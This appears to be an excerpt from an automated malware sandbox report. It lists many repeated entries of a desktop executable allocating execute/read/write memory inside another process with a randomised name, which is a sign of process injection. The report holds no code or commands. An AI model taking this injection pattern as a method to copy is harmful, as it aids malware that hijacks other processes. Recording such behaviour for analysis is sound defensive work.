            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2F00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2330000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2380000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2450000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 24A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2F50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2F60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 860000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2420000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 25D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2620000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1170000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2700000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2710000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2940000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2A90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 710000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 760000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2210000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2260000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: C40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: C50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 26E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 26F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 240000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 250000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 790000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 7A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 330000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 340000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 6E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 730000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2270000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 14B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1500000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2610000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2660000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: FA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 3C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 3D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: FE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2920000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2970000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 6E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 740000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2290000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2800000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2810000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 24F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2500000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2B60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2BB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 29A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 29F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 720000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2150000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: DF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: E00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: AE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2BC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2BD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1250000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1260000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 880000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 21B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2330000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2380000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: AC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: AD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: FA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2780000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2790000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 11A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 11B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 3020000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 780000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 790000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1370000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 13C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 14C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 14D0000 protect: page execute and read and writeJump to behavior
